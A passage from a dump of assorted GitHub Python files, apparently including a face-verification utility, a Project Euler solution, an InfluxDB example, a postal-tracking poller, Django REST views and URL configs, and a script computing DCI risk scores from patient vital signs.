list):\n for val in value:\n result += point_on_texts(text, val)\n else:\n result += point_on_texts(text, value)\n return result\n\n\ndef recognize_face(user_id: str) -> List:\n datasets_path = os.getcwd() + \"/testsets/identity/\" + user_id\n encodings_path = os.path.dirname(os.path.realpath(__file__)) + \"/encodings.pickle\"\n face_encoder.encode_faces(\n datasets=datasets_path, encodings=encodings_path, detection_method=\"cnn\"\n )\n image_path = os.getcwd() + \"/testsets/face/\" + user_id + \"/\" + \"image.jpg\"\n names = recognize_faces.recognize(\n image_path,\n datasets=datasets_path,\n encodings=encodings_path,\n detection_method=\"cnn\",\n )\n return names\n\n\ndef point_on_recognition(names: List, user_id: str) -> float:\n point = 0.0\n if not names:\n point = 0.0\n return point\n if len(names) > 1:\n for name in names:\n if name == user_id:\n point = 0.25\n else:\n if names[0] == user_id:\n point = 0.25\n return point\n","repo_name":"verifid/graph-vl","sub_path":"graphvl/utils/verification_utils.py","file_name":"verification_utils.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"28901620241","text":"\n\ndef doNext(coins, numberLeft):\n if numberLeft == 0:\n return 1\n leftCopy = numberLeft\n coinCopy = coins.copy()\n try:\n current = coinCopy.pop(0)\n except IndexError:\n return 0\n summation = 0\n while leftCopy >= 0:\n summation += doNext(coinCopy, leftCopy)\n leftCopy -= current\n return summation\n\n\nif __name__ == '__main__':\n\n lookingFor = 200\n\n coins = [1, 2, 5, 10, 20, 50, 100, 200]\n\n num = doNext(coins, lookingFor)\n print(num)\n","repo_name":"msg430/Project-Euler","sub_path":"problem31.py","file_name":"problem31.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29084088318","text":"from influxdb_client import Point, InfluxDBClient\nfrom influxdb_client.client.util.date_utils_pandas import PandasDateTimeHelper\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\n\"\"\"\nSet PandasDate helper which supports nanoseconds.\n\"\"\"\nimport influxdb_client.client.util.date_utils as date_utils\n\ndate_utils.date_helper = PandasDateTimeHelper()\n\n\"\"\"\nPrepare client.\n\"\"\"\nwith InfluxDBClient(url=\"http://localhost:8086\", token=\"my-token\", org=\"my-org\") as client:\n\n write_api = client.write_api(write_options=SYNCHRONOUS)\n \"\"\"\n Prepare data\n \"\"\"\n\n point = Point(\"h2o_feet\") \\\n .field(\"water_level\", 10) \\\n .tag(\"location\", \"pacific\") \\\n .time('1996-02-25T21:20:00.001001231Z')\n\n print(f'Time serialized with nanosecond precision: {point.to_line_protocol()}')\n print()\n\n write_api.write(bucket=\"my-bucket\", record=point)\n\n query_api = client.query_api()\n\n \"\"\"\n Query: using Stream\n \"\"\"\n query = '''\n from(bucket:\"my-bucket\")\n |> range(start: 0, stop: now())\n |> filter(fn: (r) => r._measurement == \"h2o_feet\")\n '''\n records = query_api.query_stream(query)\n\n for record in records:\n print(f'Temperature in {record[\"location\"]} is {record[\"_value\"]} at time: {record[\"_time\"]}')\n\n","repo_name":"influxdata/influxdb-client-python","sub_path":"examples/nanosecond_precision.py","file_name":"nanosecond_precision.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"72088381673","text":"import requests\nimport time\n\nuser_agent = \"com.pttxd\"\ninternational_link = \"https://pttws.ptt.gov.tr/cepptt/mssnvrPttaceaemaa/gonderitakipvepostakod/yurtDisiKargoSorgulaMSAEHPREMHMRGBAGDOGMAMA\"\ngeneral_link = \"https://pttws.ptt.gov.tr/cepptt/mssnvrPttaceaemaa/gonderitakipvepostakod/gonderisorgu2MSAEHPREMHMRGBAGDOGMAMA\"\nbarcodes = {\"BR123456789CD\": \"Left side is barcode code, right is name\", \"BR987654321CD\": \"you can put as many as you like\"}\n\nheaders = {\n 'User-Agent': user_agent,\n}\n\nwhile 1:\n\tfor barcode in barcodes.keys():\n\t\tr = requests.post(international_link, data = {'barkod': barcode}, headers = headers)\n\t\trj = r.json()\n\t\tevents = rj[\"dongu\"]\n\t\tif len(events) != 0:\n\t\t\tprint(\"Info for {}:\\n\".format(barcodes[barcode]))\n\t\t\tfor event in events:\n\t\t\t\ttext = \"{} on {}\".format(event[\"event\"], event[\"tarih\"])\n\t\t\t\tif 'ofis' in event:\n\t\t\t\t\ttext += \" at {}\".format(event[\"ofis\"])\n\t\t\t\tprint(text)\n\t\t\tprint(\"---\")\n\ttime.sleep(60*5)\n","repo_name":"aveao/PTT-API","sub_path":"PTTTrack.py","file_name":"PTTTrack.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"3235716734","text":"# -*- coding: utf-8 -*-\r\nfrom django.conf.urls import *\r\n\r\nimport views\r\nimport order_api_views\r\nimport messages_view\r\nimport api_views\r\nimport order_static_api_views\r\nimport sales_api_views\r\n\r\nurlpatterns = patterns('',\r\n\t(r'^$', views.app_login),\r\n\t(r'^logout/$', views.app_logout),\r\n\t(r'^main/$', views.app_main),\r\n\t(r'^messages/$',views.list_messages),\r\n\t(r'^messages/session_history/show/(\\d*)$', views.get_session_histories),\r\n\t(r'^messages/reply/$', views.reply_session),\r\n\t(r'^order/$',views.list_orders),\r\n\t(r'^order_detail/(\\d+)/$',views.order),\r\n\t(r'^show_index/$', api_views.show_index),\r\n\t#api获取数据\r\n\t(r'^api/order_list/get/$', order_api_views.get_order_list),\r\n\t(r'^api/order/get/$', order_api_views.get_order),\r\n\t(r'^api/order_express_name/get/$', order_api_views.get_order_express_name),\r\n\t(r'^api/express_info/add/$',order_api_views.add_express_info),\r\n\t(r'^api/order_status/update/$',order_api_views.update_order_status),\r\n\t(r'^new_base/$',views.new_base),\r\n\t(r'^api/messages/$',messages_view.list_messages),\r\n\t(r'^api/messages/session_history/$', messages_view.get_session_histories),\r\n\t(r'^api/messages/reply/$', messages_view.reply_session),\r\n\t(r'^api/messages/get_unread_count/$', messages_view.get_realtime_unread_count),\r\n\t(r'^api/messages/send_media/$', messages_view.send_media),\r\n\t(r'^api/messages/send_mui_media/$', messages_view.send_mui_media),\r\n\t(r'^api/order_daily_trend/get/$', api_views.get_order_daily_trend),\r\n\t(r'^api/sale_daily_trend/get/$', api_views.get_sale_daily_trend),\r\n\t(r'^api/visit_daily_trend/get/$', api_views.get_visit_daily_trend),\r\n\t(r'^api/message_daily_trend/get/$', api_views.get_message_daily_trend),\r\n\t(r'^api/yesterday_count_trend/get/$', api_views.get_yesterday_count_trend),\r\n\t(r'^api/yesterday_price_trend/get/$', api_views.get_yesterday_price_trend),\r\n\t(r'^api/login/get/$', api_views.get_login),\r\n\t(r'^api/logout/get/$', api_views.get_logout),\r\n\t(r'^api/version/check/$', api_views.check_version),\r\n\r\n\t(r'^api/buy_trend/get/$', api_views.get_buy_trend),#(2.0版本使用)\r\n\t(r'^api/daily_message_trend/get/$', api_views.get_daily_message_trend),#(2.0版本使用)\r\n\t(r'^get_index_html/$', api_views.get_index_html),\r\n\r\n\t#数据统计\r\n\t(r'^api/order_statistic/order_by_pay_type/get/$',order_static_api_views.get_order_by_pay_type),\r\n\t(r'^api/order_statistic/order_by_product/get/$',order_static_api_views.get_order_by_product),\r\n\t(r'^api/order_statistic/order_by_source/get/$',order_static_api_views.get_order_by_source),\r\n\t(r'^api/order_statistic/user_source_by_day/get/$',order_static_api_views.get_user_source_by_day),\r\n\t(r'^api/order_statistic/user_source_by_week/get/$',order_static_api_views.get_user_source_by_week),\r\n\t(r'^api/order_statistic/user_static/get/$',order_static_api_views.get_user_static),\r\n\r\n\t(r'^api/order_statistic/order_by_day/get/', sales_api_views.get_order_by_day),\r\n\t(r'^api/order_statistic/order_by_week/get/', sales_api_views.get_order_by_week),\r\n\t(r'^api/order_statistic/order_by_month/get/', sales_api_views.get_order_by_month),\r\n\t(r'^api/order_statistic/order_by_status/get/', sales_api_views.get_order_by_status),\r\n\r\n\t(r'^api/mui/messages/$', messages_view.mui_list_messages),\r\n\t(r'^api/mui/messages/session_history/$', messages_view.mui_get_session_histories),\r\n\t(r'^api/mui/messages/additional_history/$', messages_view.mui_get_additional_histories),\r\n\r\n #新增数据罗盘\r\n \t(r'^api/stats/brand_value/$', api_views.brand_value),\r\n (r'^api/stats/overview_board/$',api_views.overview_board),\r\n (r'^api/stats/order_value/$', api_views.order_value),\r\n (r'^api/stats/sales_chart/get/$', api_views.sales_chart),\r\n\r\n)\r\n","repo_name":"chengdg/weizoom","sub_path":"weapp/mobile_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22127985036","text":"import pickle as p\nimport time as t\n\ndef xyz(d):\n f=open(\"f:/venom.dat\", \"ab\")\n p.dump(d,f)\n print(\"your data is being recorded . . .\")\n t.sleep(2)\n print(\"data successfully recorded!\")\n f.close()\n\n#main_section\ndata={}\nwhile True:\n print(\" press 1 to enter the no. of lines to generate : :\")\n print(\" press 2 to show the output : :\")\n op= int(input(\"enter your option : \"))\n if op==1:\n w=int(input(\"enter the required no. of lines : \"))\n q=input(\"enter odd/even progression : \")\n for i in range(w):\n for j in range(i):\n print()\n \n \n","repo_name":"SHERLOCKx90/Python-Programming","sub_path":"random_pattern_generation.py","file_name":"random_pattern_generation.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16308172543","text":"num_students = int(input())\nstudents = []\n\nfor i in range(num_students) :\n input_data = input().split()\n students.append( (input_data[0], input_data[1]) )\n\nstudents.sort(key = lambda data : data[1])\n\nprint(\"students :\", students)\n\nfor i in students :\n print(i[0], end= '\\n')","repo_name":"pss4190/CAU_CODES","sub_path":"6_정렬/3-grade_printing.py","file_name":"3-grade_printing.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5027313411","text":"#!/usr/bin/python3\n\nimport os\n\nfrom flask_script import Manager, Shell, Command\n\nfrom app import create_app\n\napp = create_app(os.environ.get('FLASK_CONFIG') or 'default')\nmanager = Manager(app)\n\n\ndef make_shell_context():\n\treturn dict(app=app)\n\n\n# As with the Command class, the docstring you use for the function will appear when you run with the -? or --help option:\nclass Hello(Command):\n\t\"prints hello world\"\n\n\tdef run(self):\n\t\tprint(\"hello world\")\n\n\nmanager.add_command(\"shell\", Shell(make_context=make_shell_context))\nmanager.add_command(\"hello\", Hello())\n\nif __name__ == '__main__':\n\tmanager.run()\n","repo_name":"chengdanhao/BitBoxServer","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24333316974","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom . import views\n\nurlpatterns = [\n # create workflow step by step\n url(r'^workflow/$', views.WorkflowListView.as_view()),\n url(r'^workflow/(?P[0-9]+)$', views.WorkflowDetailView.as_view(), name=\"template-detail\"),\n url(r'^workflow/(?P[0-9]+)/state/$', views.StateListView.as_view(), name='template-states'),\n url(r'^state/(?P[0-9]+)$', views.StateDetailView.as_view()),\n url(r'^workflow/(?P[0-9]+)/transition/$', views.TransitionListView.as_view(), name='template-transitions'),\n url(r'^transition/(?P[0-9]+)$', views.TransitionDetailView.as_view()),\n\n # create workflow at a time\n url(r'^workflow/whole/$', views.WorkflowWholeparameterView.as_view()),\n url(r'^workflow/file/$', views.WorkflowFileView.as_view()),\n \n # change status of workflow\n url(r'^workflow/(?P[0-9]+)/status/$', views.WorkflowStatusView.as_view(), name='template-status'),\n \n # workflow preview\n url(r'^workflow/(?P[0-9]+)/png/$', views.WorkflowDetailPngView.as_view(), name=\"template-png\"),\n\n\n url(r'^workflowactivity/$', views.WorkflowActivityListView.as_view()),\n url(r'^workflowactivity/(?P[0-9]+)$', views.WorkflowActivityDetailView.as_view(), name=\"instance-detail\"),\n \n url(r'^workflowactivity/(?P[0-9]+)/state/(?P[0-9]+)$', views.WorkflowActivityStateDetailView.as_view()),\n \n url(r'^workflowactivity/(?P[0-9]+)/commit/$', views.WorkflowActivityCommitView.as_view(), name='instance-commit'),\n url(r'^workflowactivity/(?P[0-9]+)/start/$', views.WorkflowActivityStartView.as_view(), name='instance-start'),\n url(r'^workflowactivity/(?P[0-9]+)/logevent/$', views.WorkflowActivityLogeventView.as_view(), name='instance-logevent'),\n url(r'^workflowactivity/(?P[0-9]+)/abolish/$', views.WorkflowActivityAbolishView.as_view(), name='instance-abolish'),\n url(r'^workflowactivity/(?P[0-9]+)/delegate/$', views.WorkflowActivityDelegateView.as_view(), name='instance-delegate'),\n url(r'^workflowactivity/(?P[0-9]+)/history/$', views.HistoryPngView.as_view(), name='instance-history'),\n\n url(r'^participant-task/$', views.ParticipantTaskView.as_view()),\n\n # url(r'^workflowactivity/(?P[0-9]+)/state/$', views.WorkflowActivityStateListView.as_view(), name='instance-states'),\n # url(r'^workflowactivity/(?P[0-9]+)/transition/$', views.WorkflowActivityTransitionListView.as_view(), name='instance-transitions'),\n # url(r'^workflowactivity-state/(?P[0-9]+)$', views.WorkflowActivityStateDetailView.as_view()),\n\n]","repo_name":"sarar04/django-workflow","sub_path":"WorkflowEngine/workflow/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12427328561","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom .models import *\nfrom django.db import models\nimport json\nimport datetime\n\nfrom .serializers import *\n# 아래는 APIView를 사용하기 위해\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status #상태도 받아야하니까\nfrom django.http import Http404\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\n\ndef hello_world(request):\n if request.method == \"GET\":\n return JsonResponse({\n 'status' : 200,\n 'success' : True,\n 'message' : '메시지 전달 성공!',\n 'data' : \"Hello world\",\n })\n\n@require_http_methods([\"GET\",\"PATCH\",\"DELETE\"])\ndef post_detail(request,id):\n if request.method == \"GET\":\n post=get_object_or_404(Post,pk=id)\n category_json={\n \"id\":post.post_id,\n \"writer\":post.writer,\n \"content\":post.content,\n \"category\":post.category,\n }\n \n return JsonResponse({\n 'status':200,\n 'message':'게시글 조회 성공',\n 'data':category_json\n })\n elif request.method ==\"PATCH\":\n body=json.loads(request.body.decode('utf-8'))\n update_post=get_object_or_404(Post,pk=id)\n \n update_post.content=body['content']\n update_post.category=body['category']\n update_post.save()\n \n update_post_json={\n \"id\":update_post.post_id,\n \"writer\":update_post.writer,\n \"content\":update_post.content,\n \"category\":update_post.category,\n }\n return JsonResponse({\n 'status':200,\n 'message':'게시글 수정 성공',\n 'data':update_post_json\n })\n elif request.method ==\"DELETE\":\n delete_post=get_object_or_404(Post, pk=id)\n delete_post.delete()\n \n return JsonResponse({\n 'status':200,\n 'message':'게시글 삭제 성공',\n 'data':None\n })\n@require_http_methods([\"GET\"])\ndef post_all(request): \n posts=Post.objects.all()\n category_list=[]\n \n for post in posts:\n category_list.append({\n \n \"id\":post.post_id,\n \"writer\":post.writer,\n \"content\":post.content,\n \"category\":post.category,\n \n })\n return JsonResponse({\n 'status':200,\n 'message':'모든 게시글 조회 성공',\n 'data':category_list\n })\n \n@require_http_methods([\"POST\"])\ndef create_post(request):\n body=json.loads(request.body.decode('utf-8'))\n \n new_post=Post.objects.create(\n writer=body['writer'],\n content=body['content'],\n category=body['category']\n )\n \n new_post_json={\n \"id\":new_post.post_id,\n \"writer\":new_post.writer,\n \"content\":new_post.content,\n \"category\":new_post.category\n }\n return JsonResponse({\n 'status':200,\n 'message':'게시글 목록 조회 성공',\n 'data': new_post_json\n })\n@require_http_methods([\"GET\"])\ndef get_comment(request,post_id):\n comments=Comment.objects.filter(post=post_id)\n comment_json_list=[]\n for comment in comments:\n commet_json={\n 'writer':comment.writer,\n 'content':comment.content\n }\n comment_json_list.append(commet_json)\n \n return JsonResponse({\n 'status':200,\n 'message':'댓글 읽어오기 성공',\n 'data':comment_json_list\n })\n \n@require_http_methods([\"POST\"])\ndef create_comment(request):\n body=json.loads(request.body.decode('utf-8'))\n \n comment_post_id=Post.objects.get(post_id=body[\"post_id\"])\n \n new_comment=Comment.objects.create(\n post=comment_post_id,\n writer=body[\"writer\"],\n content=body[\"content\"]\n )\n \n new_comment_json={\n \"post\":body[\"post_id\"], #왜 new_comment.post, comment_post_id로 하면 안되는 걸까요ㅠㅜ\n \"writer\":new_comment.writer,\n \"content\":new_comment.content,\n }\n \n return JsonResponse({\n 'status': 200,\n 'message':'댓글 생성 성공',\n 'data':new_comment_json\n })\n \n \n@require_http_methods([\"GET\"])\ndef post_date(request): \n start=datetime.date(2023,4,5)\n end=datetime.date(2023,4,11)\n posts=Post.objects.filter(created_at__range=(start,end))\n post_list=[]\n \n for post in posts:\n post_list.append({\n \"id\":post.post_id,\n \"writer\":post.writer,\n \"content\":post.content,\n \"category\":post.category\n })\n \n return JsonResponse({\n 'status':200,\n 'message':'5주차~6주차 게시글 조회 성공',\n 'data':post_list\n })\n \n#보통 리스트에는 get, post가 들어감.\nclass PostList(APIView) :\n permission_classes=[IsAuthenticatedOrReadOnly]\n #게시글 새로 만들기\n def post(self,request,format=None):\n serializer = PostSerializer(data=request.data) #요청받은 데이터를 데이터에 넣고, 이걸 포스트시리얼라이저에 정렬\n if serializer.is_valid(): #유효하고 검증된 값인지\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n #모든 게시글 정보 가져오기\n def get(self,request,format=None):\n posts=Post.objects.all()\n #많은 post를 받아오려면 many=true 써줘야 에러 안남\n serializer = PostSerializer(posts,many=True)\n return Response(serializer.data)\n \nclass PostDetail(APIView):\n def get(self, request,id):\n post=get_object_or_404(Post,id=id)\n serializer=PostSerializer(post)\n return Response(serializer.data)\n #put은 전체 바꾸기 patch는 일부분\n def put(self,request,id):\n post=get_object_or_404(Post,id=id) #객체가 존재하지 않을때 http404 에러를 발생시킴\n serializer=PostSerializer(post,data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n def delete(self,request,id):\n post=get_object_or_404(Post,id=id)\n post.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n \n\n#댓글 전체리스트 가져오기\nclass CommentList(APIView):\n def get(self,request,format=None):\n comments=Comment.objects.all()\n serializer=CommentSerializer(comments,many=True)\n return Response(serializer.data)\n\n#글을 중심으로 가져오기\nclass PostCommentList(APIView):\n #글 번호를 이용하여 특정 글의 댓글 전체 가져오기\n def get(self,request,key,format=None):\n #comments=get_object_or_404(Comment,post=key)\n comments=Comment.objects.filter(post=key)\n serializers=CommentSerializer(comments,many=True)\n return Response(serializers.data)\n \n #글 번호를 이용하여 특정 글에 댓글 생성하기\n def post(self,request,key):\n commentPost=Post.objects.get(id=key)\n data=request.data\n data[\"post\"]=key \n serializer=CommentSerializer(data=data)\n #serializer=CommentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.validated_data[\"post\"]=commentPost\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors,status=status.HTTP_404_NOT_FOUND)\n\n#글 번호와 댓글 번호를 이용하여 조회, 수정, 삭제하기\nclass CommentDetail(APIView): \n def get(self,request,id,key):\n comment=get_object_or_404(Comment,id=id,post=key)\n serializer=CommentSerializer(comment)\n return Response(serializer.data)\n \n def put(self,request,id,key):\n comment=get_object_or_404(Comment,id=id,post=key)\n serializer=CommentSerializer(comment,data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n def delete(self,request,id,key):\n comment=get_object_or_404(Comment,id=id,post=key)\n comment.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n \nfrom rest_framework import generics\nfrom rest_framework import mixins\n#mixins은 apiview에서 request method마다 serializer 처리할때 중복되는 과정을 줄여줄 수 있다.\n#List/Create/Retrieve/Update/Destroy+ModelMixin = 리스팅,생성+저장,모델인스턴스 돌려주기, 업데이트+저장, 삭제\n#보통 genericApiView와 결합하여 crud를 구현한다.\n#mixin 클래스 안에 존재하는 것과 같은 클래스 이름 쓸 경우 오버라이딩될 수 있으니 주의!!! 이름 신중하게 지을것!\n\nclass PostListMixins(mixins.ListModelMixin,mixins.CreateModelMixin, generics.GenericAPIView):\n #아래 두줄처럼 queryset, serializer_class 지정해줘야함.\n queryset = Post.objects.all()\n serializer_class=PostSerializer\n \n def get(self,request,*args,**kwargs):\n return self.list(request)\n def post(self,request,*args,**kwargs):\n return self.create(request,*args,**kwargs)\n\nclass PostDetailMixins(mixins.CreateModelMixin,mixins.RetrieveModelMixin,mixins.UpdateModelMixin, mixins.DestroyModelMixin,generics.GenericAPIView):\n queryset= Post.objects.all()\n serializer_class=PostSerializer\n def get(self,request,*args,**kwargs):\n return self.retrieve(request)\n def put(self,request,*args,**kwargs):\n return self.update(request,*args,**kwargs)\n def delete(self,request,*args,**kwargs):\n return self.destroy(request,*args,**kwargs)\n \n#mixin 여러개 상속해야하기 때문에 concrete generic views 사용하면 가독성 좋아짐\n# ex) createAPIView는 genericAPIView, CreateModelMixin 상속받음. \nclass PostListGenericAPIView(generics.ListCreateAPIView):\n queryset=Post.objects.all()\n serializer_class=PostSerializer\n \nclass PostDetailGenericAPIView(generics.RetrieveUpdateDestroyAPIView):\n queryset=Post.objects.all()\n serializer_class=PostSerializer\n \nfrom rest_framework import viewsets\n#viewset에서는 urls 말고 여기에 as_view()\n#코드 간소화 방법\n#queryset과 serializer 한번에 처리 가능\n\n# ReadOnlyModelViewSet : 목록/특정 레코드 조회 => 속도 측면에서 좋음. \n# ModelViewSet이 보통 많이 쓰임. \nclass PostViewSet(viewsets.ModelViewSet):\n queryset=Post.objects.all()\n serializer_class=PostSerializer\n \n#post_list = PostViewSet.as_view({\n# 'get':'list',\n# 'post':'create',\n#})\n#post_detail_vs = PostViewSet.as_view({\n# 'get':'retrieve',\n# 'put':'update',\n# 'patch':'partial_update',\n# 'delete':'destroy',\n#})\n\n ","repo_name":"LikeLion-at-CAU-11th/Eunsoo-Choi","sub_path":"Django/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5325432572","text":"import numpy as np\nimport pyodbc\nimport os\nimport helper.util_func as uf\nimport helper.util_ml as uml\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport _pickle as pickle\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\ndef generate_risk_score(data):\n return\n\ndef plot_data_1(philips_resample_wide,keys,ncols = 2, show = True):\n\n temp = philips_resample_wide['timestamp']\n nrows = int(np.ceil(len(keys) / ncols))\n fig, axes = plt.subplots(nrows=nrows, ncols=ncols, figsize=(15, 10))\n\n for (key, ax) in zip(keys, axes.flatten()):\n ax.plot(temp,philips_resample_wide[key])\n philips_resample_wide[['timestamp',key]].plot(x='timestamp',y=key,ax=ax,label=key)\n # plt.title(key)\n # plt.ylabel(key)\n plt.tight_layout()\n\n if show:\n plt.show()\n return\n\ndef get_DCI_Model():\n\n # 4.2b : Retrieve Model\n # k_feats = 70\n # result_dir = 'models/results_NO_ICP_TEMP_strt_dci/'\n # #\n # fileName = result_dir + str(k_feats) + \"/ML_Results_cumulative_one_min_RR_\" + str(k_feats) + \".p\"\n # results_hours = pickle.load(open(fileName, \"rb\"),encoding='latin1')\n # (classifier_max_auc, auc_val) = uml.get_max_classifier_before_dci(results_hours, classifier_name='EC',\n # classifier_at_dci=False, classifier_at_hour=-3.5,\n # toplot=False)\n # classifer_eval = classifier_max_auc\n # fout = open('models/DCI_Model.pickle', 'wb')\n # pickle.dump(classifer_eval, fout)\n\n classifier_eval = pickle.load(open('models/DCI_Model.pickle', \"rb\"), encoding='latin1')\n return classifier_eval\n\n# the function will generate risk scores and save the results in the figures\n# 1. The input to the function are\n# a. list of patients with their demographic information and\n# b. classifer\n# 2. Output - None, generates the risk scores and saves it under figures\n\ndef generate_risk_scores(dem_patients = None, classifier_eval=None,var_ranges=None):\n demographic_vars = ['Mean_CONTINUOUS_Age', 'Mean_CATEGORICAL_Sex', 'Mean_CONTINUOUS_HH', 'Mean_CONTINUOUS_MFS',\n 'Mean_CONTINUOUS_WFNS', 'Mean_CONTINUOUS_GCS']\n keys = ['HR', 'AR-M', 'AR-D', 'AR-S', 'SPO2', 'RR']\n for index, pat in dem_patients.iterrows():\n mrn = pat['MRN']\n print(mrn)\n dem_feats_value = pat[demographic_vars]\n if dem_feats_value['Mean_CATEGORICAL_Sex'] == 'F':\n dem_feats_value['Mean_CATEGORICAL_Sex'] = 0\n else:\n dem_feats_value['Mean_CATEGORICAL_Sex'] = 1\n dem_feats_value = dem_feats_value.to_frame('Value').reset_index().rename(columns={'index': 'Features'})\n\n admndt = pat['Admin']\n dischdt = pat['Discharge']\n\n if not os.path.isfile('data/' + str(mrn) + '.xlsx'): # get resampled data\n print('download data')\n if os.path.isfile('helper/data/' + str(mrn) + '.csv'): # get 1 second data\n philips = pd.read_csv('helper/data/' + str(mrn) + '.csv')\n if 'timestamp' in philips.keys():\n philips['timestamp'] = pd.to_datetime(philips['timestamp'])\n else:\n continue\n else:\n continue # commented below line as this is not required for Federated learning project\n # with pyodbc.connect(\"DSN=Cloudera ODBC Driver for Impala\", autocommit=True) as conn:\n # philips = pd.read_sql(query, conn)\n philips['sublabel'] = philips['sublabel'].replace({\n 'ARTm': 'AR-M',\n 'ABPm': 'AR-M',\n 'ARTd': 'AR-D',\n 'ABPd': 'AR-D',\n 'ARTs': 'AR-S',\n 'ABPs': 'AR-S',\n 'SpO₂': 'SPO2' ## (MM) This line was missing, this will ignore SPO2\n })\n if 'AR-M' not in np.unique(philips['sublabel']) or 'AR-D' not in np.unique(philips['sublabel']):\n continue\n # downsample and save this data\n for k in keys:\n philips.loc[\n (philips['sublabel'] == k) & (philips['value'] > var_ranges.get(k)['max']), 'value'] = np.nan\n philips.loc[\n (philips['sublabel'] == k) & (philips['value'] <= var_ranges.get(k)['min']), 'value'] = np.nan\n # Step 4 : Downsample to a min\n # philips= philips.set_index('timestamp')\n philips_resample = philips.groupby(['sublabel']).resample('60s', on='timestamp').median().reset_index()\n philips_resample = philips_resample[philips_resample['sublabel'].isin(keys)]\n philips_resample.to_excel('helper/' + str(mrn) + '.xlsx')\n # Step 4.1 : Convert to wide format as we are using only wide format\n # philips1_resample_wide = philips_resample_wide\n # philips1_resample_wide.loc[(philips1_resample_wide['timestamp'] > '2021-12-25') & (philips1_resample_wide['timestamp'] < '2021-12-26'), keys] = np.nan\n # philips1_resample_wide = philips1_resample_wide.loc[philips1_resample_wide['timestamp'] < '2021-12-27']\n else:\n philips_resample = pd.read_excel(('data/' + str(mrn) + '.xlsx'))\n\n philips_resample_wide = philips_resample.pivot(index='timestamp', columns='sublabel',\n values='value').reset_index()\n philips_resample_wide['mrn'] = mrn\n philips_resample_wide = philips_resample_wide.ffill() # forward fill missing data\n\n # Step 2: Create feaatures ( xcorr feats)\n pat_predictor_vals = uml.compute_xcorr_feats_Impala(philips_resample_wide, dem_feats_value,\n keys=keys)\n # Generate Risk Scores\n compute_hours = 1 # this give risk scores hourly, if we change it to 12 then it will be one value every 12 hours\n (probab_vals, timevals1) = uml.compute_RiskScores_Impala(classifier_eval, pat_predictor_vals, 'EC', keys=keys,\n include_dems=True, compute_hours=compute_hours)\n # philips1 = philips_resample[philips_resample['sublabel'].isin(keys)]\n plot_data_1(philips_resample_wide, keys, ncols=3)\n plt.savefig('figures/' + str(mrn) + '_raw_data.png')\n plt.close('all')\n\n # plt.style.use('dark_background')\n plt.figure()\n plt.plot(timevals1, probab_vals, 'o-')\n plt.ylim([0.1, 1])\n plt.title('Risk Score')\n plt.xlabel('Time')\n plt.ylabel('Risk Scores')\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.axhline(y=0.35, color='red', linestyle='--')\n plt.savefig('figures/' + str(mrn) + '_Risk_score.png')\n plt.close('all')\n\n\nif __name__ == '__main__':\n print('hello')\n\n # stpe 0 : Get DCI Model\n classifier_eval = get_DCI_Model()\n # step 1: get patient\n dem_patients = pd.read_excel('helper/CurrentPatientDemographic.xlsx')\n dem_patients=dem_patients[~np.isnat(dem_patients['Admin'])]\n dem_patients=dem_patients[~np.isnat(dem_patients['Discharge'])]\n dem_patients.rename(columns=\n {'Age':'Mean_CONTINUOUS_Age',\n 'HH':'Mean_CONTINUOUS_HH',\n 'mFS':'Mean_CONTINUOUS_MFS',\n 'Sex':'Mean_CATEGORICAL_Sex',\n 'WFNS':'Mean_CONTINUOUS_WFNS',\n 'GCS':'Mean_CONTINUOUS_GCS'},inplace=True)\n\n # Step 1: Download all the data for the prospective patients\n var_ranges_file = 'helper/Variable_Range.csv'\n var_ranges = uf.get_min_max_var(var_ranges_file)\n\n #step 